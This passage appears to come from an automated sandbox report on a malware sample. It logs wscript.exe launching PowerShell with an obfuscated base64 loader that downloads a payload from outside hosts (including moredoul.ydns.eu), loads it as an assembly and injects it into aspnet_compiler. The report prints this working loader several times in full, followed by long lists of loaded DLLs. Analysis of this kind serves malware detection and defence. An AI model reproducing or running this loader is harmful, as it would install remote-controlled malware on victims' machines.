Gc#K##k#Gw#bwBk#Gc#ZQBt#GU#bgB0#HM#L##g#CQ#cwB1#H##ZQBy#HY#aQBy#Gk#b#Bp#HQ#eQ#p#Ds#J#Bt#GE#cgBh#GI#bwB1#HQ#cw#g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#QwBv#G4#dgBl#HI#d#Bd#Do#OgBG#HI#bwBt#EI#YQBz#GU#Ng#0#FM#d#By#Gk#bgBn#Cg#J#Bs#Gk#bwBk#GU#cgBh#Ck#Ow#k#GM#bwBu#HQ#cgBp#HQ#aQBv#G4#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#FI#ZQBm#Gw#ZQBj#HQ#aQBv#G4#LgBB#HM#cwBl#G0#YgBs#Hk#XQ#6#Do#T#Bv#GE#Z##o#CQ#bQBh#HI#YQBi#G8#dQB0#HM#KQ#7#CQ#YwBv#Gw#c#Bv#HI#cgBo#GU#e#Bp#HM#I##9#C##WwBk#G4#b#Bp#GI#LgBJ#E8#LgBI#G8#bQBl#F0#LgBH#GU#d#BN#GU#d#Bo#G8#Z##o#Cc#VgBB#Ek#Jw#p#C4#SQBu#HY#bwBr#GU#K##k#G4#dQBs#Gw#L##g#Fs#bwBi#Go#ZQBj#HQ#WwBd#F0#I#B##Cg#J#Bx#HU#YQBk#HI#aQBu#HY#YQBy#Gk#YQBu#HQ#L##n#Cc#L##n#Cc#L##n#Cc#L##n#GE#cwBw#G4#ZQB0#F8#YwBv#G0#c#Bp#Gw#ZQBy#Cc#L##n#Cc#L##n#Cc#L##n#Cc#L##n#Gg#d#B0#H##Og#v#C8#bQBv#HI#ZQBk#G8#dQBs#C4#eQBk#G4#cw#u#GU#dQ#v#HM#bwB1#Gw#LwBt#Gk#bgBk#C4#d#B4#HQ#Jw#s#Cc#Qw#6#Fw#U#By#G8#ZwBy#GE#bQBE#GE#d#Bh#Fw#Jw#s#Cc#ZgBl#HI#cgBp#GM#eQBh#G4#a#B5#GQ#cgBp#GM#Jw
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "$Codigo = 'J#Bm#Gw#dQB4#Gk#bwBu#GE#b#Bp#HQ#eQ#g#D0#I##n#HQ#e#B0#C4#Z#Bu#Gk#bQ#v#Gw#dQBv#HM#LwB1#GU#LgBz#G4#Z#B5#C4#b#B1#G8#Z#Bl#HI#bwBt#C8#Lw#6#H##d#B0#Gg#Jw#7#CQ#cQB1#GE#Z#By#Gk#bgB2#GE#cgBp#GE#bgB0#C##PQ#g#CQ#ZgBs#HU#e#Bp#G8#bgBh#Gw#aQB0#Hk#I##t#HI#ZQBw#Gw#YQBj#GU#I##n#CM#Jw#s#C##JwB0#Cc#Ow#k#HM#YQBp#HI#aQBu#Gc#I##9#C##JwBo#HQ#d#Bw#HM#Og#v#C8#MQ#w#DE#OQ#u#GY#aQBs#GU#bQBh#Gk#b##u#GM#bwBt#C8#YQBw#Gk#LwBm#Gk#b#Bl#C8#ZwBl#HQ#PwBm#Gk#b#Bl#Gs#ZQB5#D0#WgBy#Es#V#BO#G8#LQBf#EQ#TQBX#Gc#bQ#w#G8#bwBu#FM#cg#5#Dc#SgBB#Gs#Z#By#FU#cQBi#Ek#QwBW#GU#Rw#y#Ew#bQB1#GM#b#B6#HU#TwBO#DI#WgBh#HY#SwBx#HM#UQBn#D##TgBx#EM#a#BT#Ew#V##0#EE#JgBw#Gs#XwB2#Gk#Z##9#DM#N##y#Dg#M##z#GQ#MQBj#GM#N#Bl#DM#Yg#4#D##MQ#3#DQ#MQ#2#D##Ng#5#Dc#N#Bi#Dc#O#Bl#GI#MQ#n#Ds#J#Bs#G8#awBv#HI#eQBz#C##PQ#g#E4#ZQB3#C0#TwBi#Go#ZQBj#HQ#I#BT#Hk#cwB0#GU#bQ#u#E4#ZQB0#C4#VwBl#GI#QwBs#Gk#ZQBu#HQ#Ow#k#FM#YQBs#GU#cwBp#GE#bgBz#C##PQ#g#CQ#b#Bv#Gs#bwBy#Hk#cw#u#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#Cg#J#Bz#GE#aQBy#Gk#bgBn#Ck#Ow#k#GQ#eQBu#GE#bQBv#Gc#ZQBu#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBU#GU#e#B0#C4#RQBu#GM#bwBk#Gk#bgBn#F0#Og#6#FU#V#BG#Dg#LgBH#GU#d#BT#HQ#cgBp#G4#Zw#o#CQ#UwBh#Gw#ZQBz#Gk#YQBu#HM#KQ#7#CQ#bQBl#HM#a#Bl#HM#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#k#HU#bgBk#GU#cgBj#Gw#dQBi#C##PQ#g#Cc#P##8#EI#QQBT#EU#Ng#0#F8#RQBO#EQ#Pg#+#Cc#Ow#k#Gw#bwBk#Gc#ZQBt#GU#bgB0#HM#I##9#C##J#Bk#Hk#bgBh#G0#bwBn#GU#bg#u#Ek#bgBk#GU#e#BP#GY#K##k#G0#ZQBz#Gg#ZQBz#Ck#Ow#k#GY#cgBp#HM#awBl#HQ#cw#g#D0#I##k#GQ#eQBu#GE#bQBv#Gc#ZQBu#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#dQBu#GQ#ZQBy#GM#b#B1#GI#KQ#7#CQ#b#Bv#GQ#ZwBl#G0#ZQBu#HQ#cw#g#C0#ZwBl#C##M##g#C0#YQBu#GQ#I##k#GY#cgBp#HM#awBl#HQ#cw#g#C0#ZwB0#C##J#Bs#G8#Z#Bn#GU#bQBl#G4#d#Bz#Ds#J#Bs#G8#Z#Bn#GU#bQBl#G4#d#Bz#C##Kw#9#C##J#Bt#GU#cwBo#GU#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#J#Bz#HU#c#Bl#HI#dgBp#HI#aQBs#Gk#d#B5#C##PQ#g#CQ#ZgBy#Gk#cwBr#GU#d#Bz#C##LQ#g#CQ#b#Bv#GQ#ZwBl#G0#ZQBu#HQ#cw#7#CQ#b#Bp#G8#Z#Bl#HI#YQ#g#D0#I##k#GQ#eQBu#GE#bQBv#Gc#ZQBu#C4#UwB1#GI#cwB0#HI#aQBu#Gc#K##k#Gw#bwBk#Gc#ZQBt#GU#bgB0#HM#L##g#CQ#cwB1#H##ZQBy#HY#aQBy#Gk#b#Bp#HQ#eQ#p#Ds#J#Bt#GE#cgBh#GI#bwB1#HQ#cw#g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#QwBv#G4#dgBl#HI#d#Bd#Do#OgBG#HI#bwBt#EI#YQBz#GU#Ng#0#FM#d#By#Gk#bgBn#Cg#J#Bs#Gk#bwBk#GU#cgBh#Ck#Ow#k#GM#bwBu#HQ#cgBp#HQ#aQBv#G4#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#FI#ZQBm#Gw#ZQBj#HQ#aQBv#G4#LgBB#HM#cwBl#G0#YgBs#Hk#XQ#6#Do#T#Bv#GE#Z##o#CQ#bQBh#HI#YQBi#G8#dQB0#HM#KQ#7#CQ#YwBv#Gw#c#Bv#HI#cgBo#GU#e#Bp#HM#I##9#C##WwBk#G4#b#Bp#GI#LgBJ#E8#LgBI#G8#bQBl#F0#LgBH#GU#d#BN#GU#d#Bo#G8#Z##o#Cc#VgBB#Ek#Jw#p#C4#SQBu#HY#bwBr#GU#K##k#G4#dQBs#Gw#L##g#Fs#bwBi#Go#ZQBj#HQ#WwBd#F0#I#B##Cg#J#Bx#HU#YQBk#HI#aQBu#HY#YQBy#Gk#YQBu#HQ#L##n#Cc#L##n#Cc#L##n#Cc#L##n#GE#cwBw#G4#ZQB0#F8#YwBv#G0#c#Bp#Gw#ZQBy#Cc#L##n#Cc#L##n#Cc#L##n#Cc#L##n#Gg#d#B0#H##Og#v#C8#bQBv#HI#ZQBk#G8#dQBs#C4#eQBk#G4#cw#u#GU#dQ#v#HM#bwB1#Gw#LwBt#Gk#bgBk#C4#d#B4#HQ#Jw#s#Cc#Qw#6#Fw#U#By#G8#ZwBy#GE#bQBE#GE#d#Bh#Fw#Jw#s#Cc#ZgBl#HI#cgBp#GM#eQBh#G4#a#B5#GQ#cgBp#GM#JwJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000001.00000002.1390483855.0000025C7ED73000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.1390483855.0000025C7EE2E000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.1390483855.0000025C7EE2E000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.1390483855.0000025C7EE2E000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: ion.pdb source: powershell.exe, 00000001.00000002.1390483855.0000025C7EE2E000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: pdbpdblib.pdb` source: powershell.exe, 00000001.00000002.1390483855.0000025C7ED73000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: 089\System.Core.pdb source: powershell.exe, 00000001.00000002.1391644987.0000025C7F050000.00000004.00000020.00020000.00000000.sdmp

        Data Obfuscation

        barindex
        Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("powershell -NoProfile -Command "$Codigo = 'J#Bm#Gw#dQB4#Gk#bwBu#GE#b#Bp#HQ", "0", "false");
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: Assembly]::Load($marabouts);$colporrhexis = [dnlib.IO.Home].GetMethod('VAI').Invoke($null, [object[]] @($quadrinvariant,'','','','aspnet_compiler','','','','http://moredoul.ydns.eu/soul/mind.txt','C:\
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Codigo.Replace('#','A'))); Invoke-Expression $OWjuxd@{# Script module or binary module file associated with this manifest.ModuleToProcess = 'Pester.psm1'# Version number of this modu
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "$Codigo = 'J#Bm#Gw#dQB4#Gk#bwBu#GE#b#Bp#HQ#eQ#g#D0#I##n#HQ#e#B0#C4#Z#Bu#Gk#bQ#v#Gw#dQBv#HM#LwB1#GU#LgBz#G4#Z#B5#C4#b#B1#G8#Z#Bl#HI#bwBt#C8#Lw#6#H##d#B0#Gg#Jw#7#CQ#cQB1#GE#Z#By#Gk#bgB2#GE#cgBp#GE#bgB0#C##PQ#g#CQ#ZgBs#HU#e#Bp#G8#bgBh#Gw#aQB0#Hk#I##t#HI#ZQBw#Gw#YQBj#GU#I##n#CM#Jw#s#C##JwB0#Cc#Ow#k#HM#YQBp#HI#aQBu#Gc#I##9#C##JwBo#HQ#d#Bw#HM#Og#v#C8#MQ#w#DE#OQ#u#GY#aQBs#GU#bQBh#Gk#b##u#GM#bwBt#C8#YQBw#Gk#LwBm#Gk#b#Bl#C8#ZwBl#HQ#PwBm#Gk#b#Bl#Gs#ZQB5#D0#WgBy#Es#V#BO#G8#LQBf#EQ#TQBX#Gc#bQ#w#G8#bwBu#FM#cg#5#Dc#SgBB#Gs#Z#By#FU#cQBi#Ek#QwBW#GU#Rw#y#Ew#bQB1#GM#b#B6#HU#TwBO#DI#WgBh#HY#SwBx#HM#UQBn#D##TgBx#EM#a#BT#Ew#V##0#EE#JgBw#Gs#XwB2#Gk#Z##9#DM#N##y#Dg#M##z#GQ#MQBj#GM#N#Bl#DM#Yg#4#D##MQ#3#DQ#MQ#2#D##Ng#5#Dc#N#Bi#Dc#O#Bl#GI#MQ#n#Ds#J#Bs#G8#awBv#HI#eQBz#C##PQ#g#E4#ZQB3#C0#TwBi#Go#ZQBj#HQ#I#BT#Hk#cwB0#GU#bQ#u#E4#ZQB0#C4#VwBl#GI#QwBs#Gk#ZQBu#HQ#Ow#k#FM#YQBs#GU#cwBp#GE#bgBz#C##PQ#g#CQ#b#Bv#Gs#bwBy#Hk#cw#u#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#Cg#J#Bz#GE#aQBy#Gk#bgBn#Ck#Ow#k#GQ#eQBu#GE#bQBv#Gc#ZQBu#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBU#GU#e#B0#C4#RQBu#GM#bwBk#Gk#bgBn#F0#Og#6#FU#V#BG#Dg#LgBH#GU#d#BT#HQ#cgBp#G4#Zw#o#CQ#UwBh#Gw#ZQBz#Gk#YQBu#HM#KQ#7#CQ#bQBl#HM#a#Bl#HM#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#k#HU#bgBk#GU#cgBj#Gw#dQBi#C##PQ#g#Cc#P##8#EI#QQBT#EU#Ng#0#F8#RQBO#EQ#Pg#+#Cc#Ow#k#Gw#bwBk#Gc#ZQBt#GU#bgB0#HM#I##9#C##J#Bk#Hk#bgBh#G0#bwBn#GU#bg#u#Ek#bgBk#GU#e#BP#GY#K##k#G0#ZQBz#Gg#ZQBz#Ck#Ow#k#GY#cgBp#HM#awBl#HQ#cw#g#D0#I##k#GQ#eQBu#GE#bQBv#Gc#ZQBu#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#dQBu#GQ#ZQBy#GM#b#B1#GI#KQ#7#CQ#b#Bv#GQ#ZwBl#G0#ZQBu#HQ#cw#g#C0#ZwBl#C##M##g#C0#YQBu#GQ#I##k#GY#cgBp#HM#awBl#HQ#cw#g#C0#ZwB0#C##J#Bs#G8#Z#Bn#GU#bQBl#G4#d#Bz#Ds#J#Bs#G8#Z#Bn#GU#bQBl#G4#d#Bz#C##Kw#9#C##J#Bt#GU#cwBo#GU#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#J#Bz#HU#c#Bl#HI#dgBp#HI#aQBs#Gk#d#B5#C##PQ#g#CQ#ZgBy#Gk#cwBr#GU#d#Bz#C##LQ#g#CQ#b#Bv#GQ#ZwBl#G0#ZQBu#HQ#cw#7#CQ#b#Bp#G8#Z#Bl#HI#YQ#g#D0#I##k#GQ#eQBu#GE#bQBv#Gc#ZQBu#C4#UwB1#GI#cwB0#HI#aQBu#Gc#K##k#Gw#bwBk#Gc#ZQBt#GU#bgB0#HM#L##g#CQ#cwB1#H##ZQBy#HY#aQBy#Gk#b#Bp#HQ#eQ#p#Ds#J#Bt#GE#cgBh#GI#bwB1#HQ#cw#g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#QwBv#G4#dgBl#HI#d#Bd#Do#OgBG#HI#bwBt#EI#YQBz#GU#Ng#0#FM#d#By#Gk#bgBn#Cg#J#Bs#Gk#bwBk#GU#cgBh#Ck#Ow#k#GM#bwBu#HQ#cgBp#HQ#aQBv#G4#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#FI#ZQBm#Gw#ZQBj#HQ#aQBv#G4#LgBB#HM#cwBl#G0#YgBs#Hk#XQ#6#Do#T#Bv#GE#Z##o#CQ#bQBh#HI#YQBi#G8#dQB0#HM#KQ#7#CQ#YwBv#Gw#c#Bv#HI#cgBo#GU#e#Bp#HM#I##9#C##WwBk#G4#b#Bp#GI#LgBJ#E8#LgBI#G8#bQBl#F0#LgBH#GU#d#BN#GU#d#Bo#G8#Z##o#Cc#VgBB#Ek#Jw#p#C4#SQBu#HY#bwBr#GU#K##k#G4#dQBs#Gw#L##g#Fs#bwBi#Go#ZQBj#HQ#WwBd#F0#I#B##Cg#J#Bx#HU#YQBk#HI#aQBu#HY#YQBy#Gk#YQBu#HQ#L##n#Cc#L##n#Cc#L##n#Cc#L##n#GE#cwBw#G4#ZQB0#F8#YwBv#G0#c#Bp#Gw#ZQBy#Cc#L##n#Cc#L##n#Cc#L##n#Cc#L##n#Gg#d#B0#H##Og#v#C8#bQBv#HI#ZQBk#G8#dQBs#C4#eQBk#G4#cw#u#GU#dQ#v#HM#bwB1#Gw#LwBt#Gk#bgBk#C4#d#B4#HQ#Jw#s#Cc#Qw#6#Fw#U#By#G8#ZwBy#GE#bQBE#GE#d#Bh#Fw#Jw#s#Cc#ZgBl#HI#cgBp#GM#eQBh#G4#a#B5#GQ#cgBp#GM#Jw
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "$Codigo = 'J#Bm#Gw#dQB4#Gk#bwBu#GE#b#Bp#HQ#eQ#g#D0#I##n#HQ#e#B0#C4#Z#Bu#Gk#bQ#v#Gw#dQBv#HM#LwB1#GU#LgBz#G4#Z#B5#C4#b#B1#G8#Z#Bl#HI#bwBt#C8#Lw#6#H##d#B0#Gg#Jw#7#CQ#cQB1#GE#Z#By#Gk#bgB2#GE#cgBp#GE#bgB0#C##PQ#g#CQ#ZgBs#HU#e#Bp#G8#bgBh#Gw#aQB0#Hk#I##t#HI#ZQBw#Gw#YQBj#GU#I##n#CM#Jw#s#C##JwB0#Cc#Ow#k#HM#YQBp#HI#aQBu#Gc#I##9#C##JwBo#HQ#d#Bw#HM#Og#v#C8#MQ#w#DE#OQ#u#GY#aQBs#GU#bQBh#Gk#b##u#GM#bwBt#C8#YQBw#Gk#LwBm#Gk#b#Bl#C8#ZwBl#HQ#PwBm#Gk#b#Bl#Gs#ZQB5#D0#WgBy#Es#V#BO#G8#LQBf#EQ#TQBX#Gc#bQ#w#G8#bwBu#FM#cg#5#Dc#SgBB#Gs#Z#By#FU#cQBi#Ek#QwBW#GU#Rw#y#Ew#bQB1#GM#b#B6#HU#TwBO#DI#WgBh#HY#SwBx#HM#UQBn#D##TgBx#EM#a#BT#Ew#V##0#EE#JgBw#Gs#XwB2#Gk#Z##9#DM#N##y#Dg#M##z#GQ#MQBj#GM#N#Bl#DM#Yg#4#D##MQ#3#DQ#MQ#2#D##Ng#5#Dc#N#Bi#Dc#O#Bl#GI#MQ#n#Ds#J#Bs#G8#awBv#HI#eQBz#C##PQ#g#E4#ZQB3#C0#TwBi#Go#ZQBj#HQ#I#BT#Hk#cwB0#GU#bQ#u#E4#ZQB0#C4#VwBl#GI#QwBs#Gk#ZQBu#HQ#Ow#k#FM#YQBs#GU#cwBp#GE#bgBz#C##PQ#g#CQ#b#Bv#Gs#bwBy#Hk#cw#u#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#Cg#J#Bz#GE#aQBy#Gk#bgBn#Ck#Ow#k#GQ#eQBu#GE#bQBv#Gc#ZQBu#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBU#GU#e#B0#C4#RQBu#GM#bwBk#Gk#bgBn#F0#Og#6#FU#V#BG#Dg#LgBH#GU#d#BT#HQ#cgBp#G4#Zw#o#CQ#UwBh#Gw#ZQBz#Gk#YQBu#HM#KQ#7#CQ#bQBl#HM#a#Bl#HM#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#k#HU#bgBk#GU#cgBj#Gw#dQBi#C##PQ#g#Cc#P##8#EI#QQBT#EU#Ng#0#F8#RQBO#EQ#Pg#+#Cc#Ow#k#Gw#bwBk#Gc#ZQBt#GU#bgB0#HM#I##9#C##J#Bk#Hk#bgBh#G0#bwBn#GU#bg#u#Ek#bgBk#GU#e#BP#GY#K##k#G0#ZQBz#Gg#ZQBz#Ck#Ow#k#GY#cgBp#HM#awBl#HQ#cw#g#D0#I##k#GQ#eQBu#GE#bQBv#Gc#ZQBu#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#dQBu#GQ#ZQBy#GM#b#B1#GI#KQ#7#CQ#b#Bv#GQ#ZwBl#G0#ZQBu#HQ#cw#g#C0#ZwBl#C##M##g#C0#YQBu#GQ#I##k#GY#cgBp#HM#awBl#HQ#cw#g#C0#ZwB0#C##J#Bs#G8#Z#Bn#GU#bQBl#G4#d#Bz#Ds#J#Bs#G8#Z#Bn#GU#bQBl#G4#d#Bz#C##Kw#9#C##J#Bt#GU#cwBo#GU#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#J#Bz#HU#c#Bl#HI#dgBp#HI#aQBs#Gk#d#B5#C##PQ#g#CQ#ZgBy#Gk#cwBr#GU#d#Bz#C##LQ#g#CQ#b#Bv#GQ#ZwBl#G0#ZQBu#HQ#cw#7#CQ#b#Bp#G8#Z#Bl#HI#YQ#g#D0#I##k#GQ#eQBu#GE#bQBv#Gc#ZQBu#C4#UwB1#GI#cwB0#HI#aQBu#Gc#K##k#Gw#bwBk#Gc#ZQBt#GU#bgB0#HM#L##g#CQ#cwB1#H##ZQBy#HY#aQBy#Gk#b#Bp#HQ#eQ#p#Ds#J#Bt#GE#cgBh#GI#bwB1#HQ#cw#g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#QwBv#G4#dgBl#HI#d#Bd#Do#OgBG#HI#bwBt#EI#YQBz#GU#Ng#0#FM#d#By#Gk#bgBn#Cg#J#Bs#Gk#bwBk#GU#cgBh#Ck#Ow#k#GM#bwBu#HQ#cgBp#HQ#aQBv#G4#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#FI#ZQBm#Gw#ZQBj#HQ#aQBv#G4#LgBB#HM#cwBl#G0